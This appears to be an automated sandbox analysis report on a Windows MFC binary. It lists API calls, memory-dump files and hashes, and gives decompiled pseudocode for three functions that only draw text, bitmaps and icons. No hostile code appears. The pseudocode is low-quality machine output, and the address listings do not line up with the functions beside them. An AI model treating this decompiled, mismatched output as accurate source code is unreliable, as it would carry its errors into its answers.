0x0041727b
0x0041727b
0x0041727b
0x00417282
0x00417283
0x00417286
0x00417290
0x00417296
0x0041729a
0x004172a4
0x004172a7
0x004172ad
0x004172b1
0x004172b9
0x004172bc
0x004172bf
0x004172c4
0x004172cb
0x004172d6
0x004172de

APIs

_EH_prolog.MSVCRT ref: 004170D9
#323.MFC42 ref: 004170E7
GetSysColor.USER32(00000010), ref: 004170F9
GetObjectA.GDI32(?,00000018,?), ref: 00417135
CreateCompatibleDC.GDI32(00000000), ref: 00417142
#1640.MFC42(00000000), ref: 00417148
#5785.MFC42(?,?,00000000), ref: 0041715F
#323.MFC42(?,?,00000000), ref: 0041716A
CreateCompatibleDC.GDI32(00000000), ref: 00417192
#1640.MFC42(00000000), ref: 00417198
CreateCompatibleBitmap.GDI32(?,?,?), ref: 004171A6
#1641.MFC42(00000000), ref: 004171B0
GetSysColor.USER32(0000000F), ref: 004171B7
CreateSolidBrush.GDI32(00000000), ref: 004171BA
#1641.MFC42(00000000), ref: 004171C4
#5785.MFC42(?,?,00000000), ref: 004171D7
FillRect.USER32 ref: 00417202
GetPixel.GDI32(?,00000001,00000001), ref: 00417215
#2414.MFC42 ref: 0041721D
#5785.MFC42(?,?), ref: 00417231
GetPixel.GDI32(?,?,00000000), ref: 0041724C
SetPixel.GDI32(?,?,00000000,?), ref: 0041725D
#5785.MFC42(?,00000003,?,?), ref: 00417286
#2414.MFC42(?,00000003,?,?), ref: 0041729A
#2414.MFC42(?,00000003,?,?), ref: 004172B1
#640.MFC42(?,00000003,?,?), ref: 004172BF
#640.MFC42(?,00000003,?,?), ref: 004172CB

Strings

\B, xrefs: 004171C1
LB, xrefs: 004171AD

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #5785Create$#2414CompatiblePixel$#1640#1641#323#640Color$BitmapBrushFillH_prologObjectRectSolid
String ID: LB$\B
API String ID: 672399798-2432678322
Opcode ID: 2d9f819e55e5af05ed88dd2da8ec726ac8eb8544df9b9b53f1882804ea27c239
Instruction ID: 313f9a843d6c1ad7ac72e3a4b07849e85401b5f300941fb5f6298cfcd401ad52
Opcode Fuzzy Hash: 2d9f819e55e5af05ed88dd2da8ec726ac8eb8544df9b9b53f1882804ea27c239
Instruction Fuzzy Hash: DC613571D00159AACF00EFE1ED859EEBBB9FF58304F11402AF505A7261DB389A85CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0040153C, Relevance: 49.8, APIs: 33, Instructions: 253
windowCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E0040153C(intOrPtr __ecx, void* __eflags) {
				struct tagSIZE _t84;
				intOrPtr _t106;
				long _t116;
				struct HICON__* _t119;
				signed int _t120;
				void* _t121;
				intOrPtr _t125;
				signed int _t136;
				intOrPtr _t138;
				intOrPtr _t139;
				intOrPtr _t140;
				struct tagSIZE _t145;
				struct tagSIZE* _t181;
				intOrPtr _t183;
				void* _t184;
				intOrPtr _t186;
				struct tagSIZE _t187;
				intOrPtr _t190;
				intOrPtr _t191;
				void* _t194;

				L004269E6();
				_t138 =  *((intOrPtr*)(_t194 + 0x14));
				_t183 = __ecx;
				_push(_t194 - 0x18);
				 *((intOrPtr*)(_t194 - 0x10)) = __ecx;
				L004014F6(_t138);
				_t190 =  *((intOrPtr*)(_t194 + 8));
				 *(_t194 - 4) =  *(_t194 - 4) & 0x00000000;
				_t181 = _t194 - 0x28;
				GetTextExtentPoint32A( *(_t190 + 8),  *(_t194 - 0x18),  *( *(_t194 - 0x18) - 8), _t181);
				_t84 =  *(_t194 - 0x28);
				 *(_t194 - 0x20) = _t84;
				_t145 = _t84 + 4;
				 *(_t194 - 0x20) = _t145;
				if(_t145 > 0xc8) {
					 *(_t194 - 0x20) = 0xc8;
				}
				 *(_t194 - 0x14) =  *(_t194 - 0x14) & 0x00000000;
				if( *((intOrPtr*)(_t138 + 0x20)) != 0) {
					_t136 = 0x12;
					 *(_t194 - 0x20) =  *(_t194 - 0x20) + _t136;
					 *(_t194 - 0x14) = _t136;
				}
				_push(_t183 + 0x60);
				L00426636();
				_t139 =  *((intOrPtr*)(_t194 + 0xc));
				_push(0x19);
				_push(_t139);
				_push(_t194 - 0x30);
				L004266F0();
				_push(6);
				_push(_t139);
				L004266EA();
				_push(6);
				_t184 =  *(_t194 - 0x20) + _t139;
				_push(_t184 + 5);
				L004266EA();
				_push(0x1a);
				_push(_t184 + 5);
				L004266EA();
				_push( *((intOrPtr*)(_t194 - 0x10)) + 0x58);
				L00426636();
				_push(0x19);
				_push(_t139 + 2);
				_push(_t194 - 0x30);
				L004266F0();
				_push(8);
				_push(_t139 + 2);
				L004266EA();
				_push(8);
				_push(_t184 + 2);
				L004266EA();
				_push( *((intOrPtr*)(_t194 - 0x10)) + 0x78);
				L00426636();
				_push(8);
				_push(_t184 + 4);
				_push(_t194 - 0x30);
				L004266F0();
				_push(0x19);
				_push(_t184 + 4);
				L004266EA();
				_push( *((intOrPtr*)(_t194 - 0x10)) + 0x68);
				L00426636();
				_push(0x1a);
				_push(_t139 - 1);
				_push(_t194 - 0x30);
				L004266F0();
				_t106 = _t184 + 6;
				_push(0x1a);
				 *((intOrPtr*)(_t194 + 8)) = _t106;
				_push(_t106);
				L004266EA();
				_push(0x1b);
				_push(_t139 - 1);
				_push(_t194 - 0x30);
				L004266F0();
				_push(0x1b);
				_push( *((intOrPtr*)(_t194 + 8)));
				L004266EA();
				_push( *((intOrPtr*)(_t194 - 0x10)) + 0x60);
				L00426636();
				_push(0x19);
				_push(0);
				_push(_t194 - 0x30);
				L004266F0();
				_push(0x19);
				_push(_t139);
				L004266EA();
				_push(0x19);
				_push(_t184 + 7);
				_push(_t194 - 0x30);
				L004266F0();
				_t186 =  *((intOrPtr*)(_t194 + 0x10));
				_push(0x19);
				_push( *((intOrPtr*)(_t186 + 8)));
				L004266EA();
				_push( *((intOrPtr*)(_t194 - 0x10)) + 0x58);
				L00426636();
				if(_t139 != 0) {
					_push(0x1b);
					_push(0);
					_push(_t194 - 0x30);
					L004266F0();
					_push(0x1b);
					_push(_t139);
					L004266EA();
				}
				_push(0x1b);
				_push( *((intOrPtr*)(_t194 + 8)));
				_push(_t194 - 0x30);
				L004266F0();
				_push(0x1b);
				_push( *((intOrPtr*)(_t186 + 8)));
				L004266EA();
				_t116 = GetSysColor(0xf);
				_t187 =  *(_t194 - 0x20);
				_push(_t116);
				_push(0x14);
				_push(_t187);
				_push(9);
				_push(_t139 + 3);
				L0042671A();
				_t119 =  *( *((intOrPtr*)(_t194 + 0x14)) + 0x20);
				if(_t119 != 0) {
					DrawIconEx( *(_t190 + 4), _t139 + 4, 8, _t119, 0x10, 0x10, 0, 0, 3);
				}
				_t120 =  *(_t194 - 0x14);
				_t191 =  *((intOrPtr*)(_t194 - 0x24));
				_t65 = _t139 + 3; // 0x3
				_t140 = _t120 + _t65;
				_t121 = 0x14;
				 *((intOrPtr*)(_t194 - 0x38)) = _t187 - _t120 + _t140;
				asm("cdq");
				_t125 = (_t121 - _t191 - _t181 >> 1) + 7;
				 *((intOrPtr*)(_t194 - 0x40)) = _t140;
				 *((intOrPtr*)(_t194 - 0x3c)) = _t125;
				 *((intOrPtr*)(_t194 - 0x34)) = _t125 + _t191;
				L00401BC7( *((intOrPtr*)(_t194 + 0x14)),  *((intOrPtr*)(_t194 - 0x10)) + 0x80);
				E004011B8( *((intOrPtr*)(_t194 + 0x14)), _t194 - 0x40);
				 *(_t194 - 4) =  *(_t194 - 4) | 0xffffffff;
				_t77 = _t187 + 6; // 0x6
				L00425DFC();
				 *[fs:0x0] =  *((intOrPtr*)(_t194 - 0xc));
				return _t77;
			}

0x00421d5c
0x00421d65
0x00421d6a
0x00421d6f
0x00421d72
0x00421d75
0x00421d7d
0x00421d80
0x00421d84
0x00421d90
0x00421d96
0x00421d99
0x00421d9c
0x00421da6
0x00421da9
0x00421dab
0x00421dab
0x00421dae
0x00421db6
0x00421dba
0x00421dbb
0x00421dbe
0x00421dbe
0x00421dc6
0x00421dc7
0x00421dcc
0x00421dcf
0x00421dd4
0x00421dd5
0x00421dd8
0x00421ddd
0x00421ddf
0x00421de2
0x00421dea
0x00421dee
0x00421df4
0x00421df5
0x00421dfd
0x00421dff
0x00421e02
0x00421e0f
0x00421e10
0x00421e18
0x00421e1a
0x00421e1e
0x00421e21
0x00421e29
0x00421e2b
0x00421e2e
0x00421e36
0x00421e38
0x00421e3b
0x00421e48
0x00421e49
0x00421e51
0x00421e53
0x00421e57
0x00421e5a
0x00421e62
0x00421e64
0x00421e67
0x00421e74
0x00421e75
0x00421e7d
0x00421e7f
0x00421e83
0x00421e86
0x00421e8b
0x00421e8e
0x00421e90
0x00421e93
0x00421e96
0x00421e9e
0x00421ea0
0x00421ea4
0x00421ea7
0x00421eac
0x00421eb0
0x00421eb3
0x00421ec0
0x00421ec1
0x00421ec6
0x00421ecb
0x00421ecd
0x00421ed0
0x00421ed5
0x00421ed7
0x00421eda
0x00421ee2
0x00421ee7
0x00421ee8
0x00421eeb
0x00421ef0
0x00421ef3
0x00421ef7
0x00421efa
0x00421f07
0x00421f08
0x00421f0f
0x00421f11
0x00421f16
0x00421f18
0x00421f1b
0x00421f20
0x00421f22
0x00421f25
0x00421f25
0x00421f2a
0x00421f2f
0x00421f34
0x00421f35
0x00421f3a
0x00421f3e
0x00421f41
0x00421f48
0x00421f4e
0x00421f51
0x00421f52
0x00421f54
0x00421f58
0x00421f5a
0x00421f5d
0x00421f65
0x00421f6a
0x00421f80
0x00421f80
0x00421f86
0x00421f89
0x00421f92
0x00421f92
0x00421f96
0x00421f9b
0x00421f9e
0x00421fa6
0x00421fa9
0x00421fac
0x00421fb1
0x00421fbd
0x00421fc9
0x00421fce
0x00421fd5
0x00421fd8
0x00421fe5
0x00421fed

APIs

_EH_prolog.MSVCRT ref: 00421D5C
GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 00421D90
#5787.MFC42(?), ref: 00421DC7
#4297.MFC42(?,?,00000019,?), ref: 00421DD8
#4133.MFC42(?,00000006,?,?,00000019,?), ref: 00421DE2
#4133.MFC42(?,00000006,?,00000006,?,?,00000019,?), ref: 00421DF5
#4133.MFC42(?,0000001A,?,00000006,?,00000006,?,?,00000019,?), ref: 00421E02
#5787.MFC42(?,?,0000001A,?,00000006,?,00000006,?,?,00000019,?), ref: 00421E10
#4297.MFC42(?,?,00000019,?,?,0000001A,?,00000006,?,00000006,?,?,00000019,?), ref: 00421E21
#4133.MFC42(?,00000008,?,?,00000019,?,?,0000001A,?,00000006,?,00000006,?,?,00000019,?), ref: 00421E2E
#4133.MFC42(?,00000008,?,00000008,?,?,00000019,?,?,0000001A,?,00000006,?,00000006,?,?), ref: 00421E3B
#5787.MFC42(?,?,00000008,?,00000008,?,?,00000019,?,?,0000001A,?,00000006,?,00000006,?), ref: 00421E49
#4297.MFC42(?,00000000,00000008,?,?,00000008,?,00000008,?,?,00000019,?,?,0000001A,?,00000006), ref: 00421E5A
#4133.MFC42(00000000,00000019,?,00000000,00000008,?,?,00000008,?,00000008,?,?,00000019,?,?,0000001A), ref: 00421E67
#5787.MFC42(?,00000000,00000019,?,00000000,00000008,?,?,00000008,?,00000008,?,?,00000019,?,?), ref: 00421E75
#4297.MFC42(?,?,0000001A,?,00000000,00000019,?,00000000,00000008,?,?,00000008,?,00000008,?,?), ref: 00421E86
#4133.MFC42(?,0000001A,?,?,0000001A,?,00000000,00000019,?,00000000,00000008,?,?,00000008,?,00000008), ref: 00421E96
#4297.MFC42(?,?,0000001B,?,0000001A,?,?,0000001A,?,00000000,00000019,?,00000000,00000008,?,?), ref: 00421EA7
#4133.MFC42(?,0000001B,?,?,0000001B,?,0000001A,?,?,0000001A,?,00000000,00000019,?,00000000,00000008), ref: 00421EB3
#5787.MFC42(?,?,0000001B,?,?,0000001B,?,0000001A,?,?,0000001A,?,00000000,00000019,?,00000000), ref: 00421EC1
#4297.MFC42(?,00000000,00000019,?,?,0000001B,?,?,0000001B,?,0000001A,?,?,0000001A,?,00000000), ref: 00421ED0
#4133.MFC42(?,00000019,?,00000000,00000019,?,?,0000001B,?,?,0000001B,?,0000001A,?,?,0000001A), ref: 00421EDA
#4297.MFC42(?,?,00000019,?,00000019,?,00000000,00000019,?,?,0000001B,?,?,0000001B,?,0000001A), ref: 00421EEB
#4133.MFC42(?,00000019,?,?,00000019,?,00000019,?,00000000,00000019,?,?,0000001B,?,?,0000001B), ref: 00421EFA
#5787.MFC42(?,?,00000019,?,?,00000019,?,00000019,?,00000000,00000019,?,?,0000001B,?,?), ref: 00421F08
#4297.MFC42(?,00000000,0000001B,?,?,00000019,?,?,00000019,?,00000019,?,00000000,00000019,?,?), ref: 00421F1B
#4133.MFC42(?,0000001B,?,00000000,0000001B,?,?,00000019,?,?,00000019,?,00000019,?,00000000,00000019), ref: 00421F25
#4297.MFC42(?,?,0000001B,?,?,00000019,?,?,00000019,?,00000019,?,00000000,00000019,?,?), ref: 00421F35
#4133.MFC42(?,0000001B,?,?,0000001B,?,?,00000019,?,?,00000019,?,00000019,?,00000000,00000019), ref: 00421F41
GetSysColor.USER32(0000000F), ref: 00421F48
#2753.MFC42(?,00000009,00000000,00000014,00000000,?,00000019,?,00000019,?,00000000,00000019,?,?,0000001B,?), ref: 00421F5D
DrawIconEx.USER32 ref: 00421F80
#800.MFC42(?,?,00000009,00000000,00000014,00000000,?,00000019,?,00000019,?,00000000,00000019,?,?,0000001B), ref: 00421FD8

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #4133$#4297$#5787$#2753#800ColorDrawExtentH_prologIconPoint32Text
String ID:
API String ID: 1791607649-0
Opcode ID: a57fcb370116a01f92f609e08d7a51872a30a691ee55f43de9a79847cada2ad6
Instruction ID: 8e621f14b41bf3480495747f93a6453a26f95988e6b21dbd7f422aa2148f89e2
Opcode Fuzzy Hash: a57fcb370116a01f92f609e08d7a51872a30a691ee55f43de9a79847cada2ad6
Instruction Fuzzy Hash: AC91A371700229ABCB14DF95DCA2FEEB7A9BB48704F41412EF505E72C1DB78A905CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00416ADA, Relevance: 49.2, APIs: 26, Strings: 2, Instructions: 165
windowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00416ADA() {
				void* _t76;
				signed int _t85;
				long _t93;
				void* _t94;
				intOrPtr _t95;
				long _t97;
				long _t98;
				void* _t111;
				int _t118;
				signed int _t119;
				intOrPtr _t120;
				int _t123;
				void* _t129;
				void* _t131;
				long long* _t132;

				L004269E6();
				_t132 = _t131 - 0x60;
				L004264B0();
				_t118 =  *(_t129 + 8);
				 *(_t129 - 4) = 0;
				GetObjectA( *(_t118 + 4), 0x18, _t129 - 0x6c);
				_push(CreateCompatibleDC(0));
				L004264AA();
				if(_t118 != 0) {
					_t76 =  *(_t118 + 4);
				} else {
					_t76 = 0;
				}
				_push(_t76);
				_push( *(_t129 - 0x30));
				L00426540();
				 *(_t129 - 0x14) = _t76;
				L004264B0();
				 *(_t129 - 4) = 1;
				L00401974(_t129 - 0x1c);
				 *(_t129 - 0x1c) = 0x42e55c;
				 *(_t129 - 4) = 2;
				L00401974(_t129 - 0x24);
				 *(_t129 - 0x24) = 0x42e34c;
				 *(_t129 - 4) = 3;
				_push(CreateCompatibleDC(0));
				L004264AA();
				_push(CreateCompatibleBitmap( *(_t129 - 0x30),  *(_t129 - 0x68),  *(_t129 - 0x64)));
				L004264BC();
				_push(CreateSolidBrush(GetSysColor(0xf)));
				L004264BC();
				_t24 = _t129 - 0x24; // 0x42e34c
				asm("sbb eax, eax");
				_t85 =  ~_t24 &  *(_t129 - 0x20);
				_push(_t85);
				_push( *(_t129 - 0x40));
				L00426540();
				_t119 = _t85;
				 *(_t129 - 0x4c) =  *(_t129 - 0x68);
				 *(_t129 - 0x48) =  *(_t129 - 0x64);
				_t31 = _t129 - 0x1c; // 0x42e55c
				asm("sbb eax, eax");
				 *(_t129 - 0x54) = 0;
				 *((intOrPtr*)(_t129 - 0x50)) = 0;
				FillRect( *(_t129 - 0x40), _t129 - 0x54,  ~_t31 &  *(_t129 - 0x18));
				_t93 = GetPixel( *(_t129 - 0x40), 1, 1);
				_t38 = _t129 - 0x1c; // 0x42e55c
				_t111 = _t38;
				 *(_t129 - 0x10) = _t93;
				L00425FA6();
				if(_t119 != 0) {
					_t120 =  *((intOrPtr*)(_t119 + 4));
				} else {
					_t120 = 0;
				}
				_push(_t120);
				_push( *(_t129 - 0x40));
				L00426540();
				 *(_t129 + 8) = 0;
				if( *(_t129 - 0x68) > 0) {
					do {
						_t123 = 0;
						if( *(_t129 - 0x64) > 0) {
							do {
								_t97 = GetPixel( *(_t129 - 0x30),  *(_t129 + 8), _t123);
								_t138 = _t97 -  *(_t129 - 0x10);
								if(_t97 !=  *(_t129 - 0x10)) {
									_push(_t111);
									 *_t132 =  *0x42e708;
									_t98 = L0040226B(_t138, _t97, _t111);
									_t132 = _t132 + 0xc;
									SetPixel( *(_t129 - 0x30),  *(_t129 + 8), _t123, _t98);
								}
								_t123 = _t123 + 1;
							} while (_t123 <  *(_t129 - 0x64));
						}
						 *(_t129 + 8) =  *(_t129 + 8) + 1;
					} while ( *(_t129 + 8) <  *(_t129 - 0x68));
				}
				_t94 =  *(_t129 - 0x14);
				if(_t94 != 0) {
					_t95 =  *((intOrPtr*)(_t94 + 4));
				} else {
					_t95 = 0;
				}
				_push(_t95);
				_push( *(_t129 - 0x30));
				L00426540();
				 *(_t129 - 0x24) = 0x42c514;
				 *(_t129 - 4) = 4;
				L00425FA6();
				 *(_t129 - 0x1c) = 0x42c514;
				 *(_t129 - 0x24) = 0x42c4fc;
				 *(_t129 - 4) = 5;
				L00425FA6();
				 *(_t129 - 0x1c) = 0x42c4fc;
				 *(_t129 - 4) = 0;
				L0042649E();
				 *(_t129 - 4) =  *(_t129 - 4) | 0xffffffff;
				L0042649E();
				 *[fs:0x0] =  *((intOrPtr*)(_t129 - 0xc));
				return _t95;
			}

0x00416adf
0x00416ae4
0x00416aed
0x00416af2
0x00416b00
0x00416b03
0x00416b12
0x00416b16
0x00416b1d
0x00416b23
0x00416b1f
0x00416b1f
0x00416b1f
0x00416b26
0x00416b27
0x00416b2a
0x00416b32
0x00416b35
0x00416b3d
0x00416b41
0x00416b46
0x00416b50
0x00416b54
0x00416b59
0x00416b61
0x00416b67
0x00416b6b
0x00416b7f
0x00416b83
0x00416b97
0x00416b9b
0x00416ba0
0x00416ba5
0x00416ba7
0x00416baa
0x00416bab
0x00416bae
0x00416bb3
0x00416bb8
0x00416bbe
0x00416bc1
0x00416bc6
0x00416bc8
0x00416bce
0x00416bd9
0x00416bec
0x00416bee
0x00416bee
0x00416bf1
0x00416bf4
0x00416bfb
0x00416c01
0x00416bfd
0x00416bfd
0x00416bfd
0x00416c04
0x00416c05
0x00416c08
0x00416c10
0x00416c13
0x00416c15
0x00416c15
0x00416c1a
0x00416c1c
0x00416c23
0x00416c25
0x00416c28
0x00416c30
0x00416c32
0x00416c36
0x00416c3b
0x00416c46
0x00416c46
0x00416c4c
0x00416c4d
0x00416c1c
0x00416c52
0x00416c58
0x00416c15
0x00416c5d
0x00416c62
0x00416c68
0x00416c64
0x00416c64
0x00416c64
0x00416c6b
0x00416c6c
0x00416c6f
0x00416c79
0x00416c7f
0x00416c83
0x00416c8d
0x00416c90
0x00416c96
0x00416c9a
0x00416ca2
0x00416ca5
0x00416ca8
0x00416cad
0x00416cb4
0x00416cbf
0x00416cc7

APIs

_EH_prolog.MSVCRT ref: 00416ADF
#323.MFC42 ref: 00416AED
GetObjectA.GDI32(?,00000018,?), ref: 00416B03
CreateCompatibleDC.GDI32(00000000), ref: 00416B10
#1640.MFC42(00000000), ref: 00416B16
#5785.MFC42(?,?,00000000), ref: 00416B2A
#323.MFC42(?,?,00000000), ref: 00416B35
CreateCompatibleDC.GDI32(00000000), ref: 00416B65
#1640.MFC42(00000000), ref: 00416B6B
CreateCompatibleBitmap.GDI32(?,?,?), ref: 00416B79
#1641.MFC42(00000000), ref: 00416B83
GetSysColor.USER32(0000000F), ref: 00416B8A
CreateSolidBrush.GDI32(00000000), ref: 00416B91
#1641.MFC42(00000000), ref: 00416B9B
#5785.MFC42(?,?,00000000), ref: 00416BAE
FillRect.USER32 ref: 00416BD9
GetPixel.GDI32(?,00000001,00000001), ref: 00416BEC
#2414.MFC42 ref: 00416BF4
#5785.MFC42(?,?), ref: 00416C08
GetPixel.GDI32(?,?,00000000), ref: 00416C23
SetPixel.GDI32(?,?,00000000,00000000), ref: 00416C46
#5785.MFC42(?,00000003,?,?), ref: 00416C6F
#2414.MFC42(?,00000003,?,?), ref: 00416C83
#2414.MFC42(?,00000003,?,?), ref: 00416C9A
#640.MFC42(?,00000003,?,?), ref: 00416CA8
#640.MFC42(?,00000003,?,?), ref: 00416CB4

Strings

\B, xrefs: 00416B98
LB, xrefs: 00416B80

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #5785Create$#2414CompatiblePixel$#1640#1641#323#640$BitmapBrushColorFillH_prologObjectRectSolid
String ID: LB$\B
API String ID: 4078948297-2432678322
Opcode ID: 7f2214c6f6ec1ed85367f86e5067df99fdc5e5fbabb5baed6ef0004d04f481e8
Instruction ID: eb9d71d53f4404c7b02f88f5a925d103a553f9adf0327267d98b8a16338bbce4
Opcode Fuzzy Hash: 7f2214c6f6ec1ed85367f86e5067df99fdc5e5fbabb5baed6ef0004d04f481e8
Instruction Fuzzy Hash: E3514AB1D00159EBCF00EFE1ED859EEBBB8FF54304F51402AE505A7251DB38AA45CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0040112C, Relevance: 49.2, APIs: 26, Strings: 2, Instructions: 158
windowCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040112C() {
				void* _t76;
				signed int _t84;
				void* _t94;
				intOrPtr _t95;
				int _t117;
				signed int _t118;
				intOrPtr _t119;
				int _t122;
				void* _t128;

				L004269E6();
				L004264B0();
				_t117 =  *(_t128 + 8);
				 *(_t128 - 4) = 0;
				GetObjectA( *(_t117 + 4), 0x18, _t128 - 0x70);
				_push(CreateCompatibleDC(0));
				L004264AA();
				if(_t117 != 0) {
					_t76 =  *(_t117 + 4);
				} else {
					_t76 = 0;
				}
				_push(_t76);
				_push( *(_t128 - 0x34));
				L00426540();
				 *(_t128 - 0x18) = _t76;
				L004264B0();
				L00401974(_t128 - 0x20);
				 *(_t128 - 0x20) = 0x42e55c;
				L00401974(_t128 - 0x28);
				 *(_t128 - 0x28) = 0x42e34c;
				 *(_t128 - 4) = 3;
				_push(CreateCompatibleDC(0));
				L004264AA();
				_push(CreateCompatibleBitmap( *(_t128 - 0x34),  *(_t128 - 0x6c),  *(_t128 - 0x68)));
				L004264BC();
				_push(CreateSolidBrush(0xc0c0c0));
				L004264BC();
				_t22 = _t128 - 0x28; // 0x42e34c
				asm("sbb eax, eax");
				_t84 =  ~_t22 &  *(_t128 - 0x24);
				_push(_t84);
				_push( *(_t128 - 0x44));
				L00426540();
				_t118 = _t84;
				 *(_t128 - 0x50) =  *(_t128 - 0x6c);
				 *(_t128 - 0x4c) =  *(_t128 - 0x68);
				_t29 = _t128 - 0x20; // 0x42e55c
				asm("sbb eax, eax");
				 *(_t128 - 0x58) = 0;
				 *((intOrPtr*)(_t128 - 0x54)) = 0;
				FillRect( *(_t128 - 0x44), _t128 - 0x58,  ~_t29 &  *(_t128 - 0x1c));
				 *((intOrPtr*)(_t128 - 0x10)) = GetPixel( *(_t128 - 0x44), 1, 1);
				L00425FA6();
				if(_t118 != 0) {
					_t119 =  *((intOrPtr*)(_t118 + 4));
				} else {
					_t119 = 0;
				}
				_push(_t119);
				_push( *(_t128 - 0x44));
				L00426540();
				 *(_t128 - 0x14) = GetSysColor(0xf);
				 *(_t128 + 8) = 0;
				if( *(_t128 - 0x6c) > 0) {
					do {
						_t122 = 0;
						if( *(_t128 - 0x68) > 0) {
							do {
								if(GetPixel( *(_t128 - 0x34),  *(_t128 + 8), _t122) ==  *((intOrPtr*)(_t128 - 0x10))) {
									SetPixel( *(_t128 - 0x34),  *(_t128 + 8), _t122,  *(_t128 - 0x14));
								}
								_t122 = _t122 + 1;
							} while (_t122 <  *(_t128 - 0x68));
						}
						 *(_t128 + 8) =  *(_t128 + 8) + 1;
					} while ( *(_t128 + 8) <  *(_t128 - 0x6c));
				}
				_t94 =  *(_t128 - 0x18);
				if(_t94 != 0) {
					_t95 =  *((intOrPtr*)(_t94 + 4));
				} else {
					_t95 = 0;
				}
				_push(_t95);
				_push( *(_t128 - 0x34));
				L00426540();
				 *(_t128 - 0x28) = 0x42c514;
				 *(_t128 - 4) = 4;
				L00425FA6();
				 *(_t128 - 0x20) = 0x42c514;
				 *(_t128 - 0x28) = 0x42c4fc;
				 *(_t128 - 4) = 5;
				L00425FA6();
				 *(_t128 - 0x20) = 0x42c4fc;
				 *(_t128 - 4) = 0;
				L0042649E();
				 *(_t128 - 4) =  *(_t128 - 4) | 0xffffffff;
				L0042649E();
				 *[fs:0x0] =  *((intOrPtr*)(_t128 - 0xc));
				return _t95;
			}

0x00416ccf
0x00416cdd
0x00416ce2
0x00416cf0
0x00416cf3
0x00416d02
0x00416d06
0x00416d0d
0x00416d13
0x00416d0f
0x00416d0f
0x00416d0f
0x00416d16
0x00416d17
0x00416d1a
0x00416d22
0x00416d25
0x00416d2d
0x00416d32
0x00416d3c
0x00416d41
0x00416d49
0x00416d4f
0x00416d53
0x00416d67
0x00416d6b
0x00416d7b
0x00416d7f
0x00416d84
0x00416d89
0x00416d8b
0x00416d8e
0x00416d8f
0x00416d92
0x00416d97
0x00416d9c
0x00416da2
0x00416da5
0x00416daa
0x00416dac
0x00416db2
0x00416dbd
0x00416dd5
0x00416dd8
0x00416ddf
0x00416de5
0x00416de1
0x00416de1
0x00416de1
0x00416de8
0x00416de9
0x00416dec
0x00416dfc
0x00416dff
0x00416e02
0x00416e04
0x00416e04
0x00416e09
0x00416e0b
0x00416e17
0x00416e23
0x00416e23
0x00416e29
0x00416e2a
0x00416e0b
0x00416e2f
0x00416e35
0x00416e04
0x00416e3a
0x00416e3f
0x00416e45
0x00416e41
0x00416e41
0x00416e41
0x00416e48
0x00416e49
0x00416e4c
0x00416e56
0x00416e5c
0x00416e60
0x00416e6a
0x00416e6d
0x00416e73
0x00416e77
0x00416e7f
0x00416e82
0x00416e85
0x00416e8a
0x00416e91
0x00416e9c
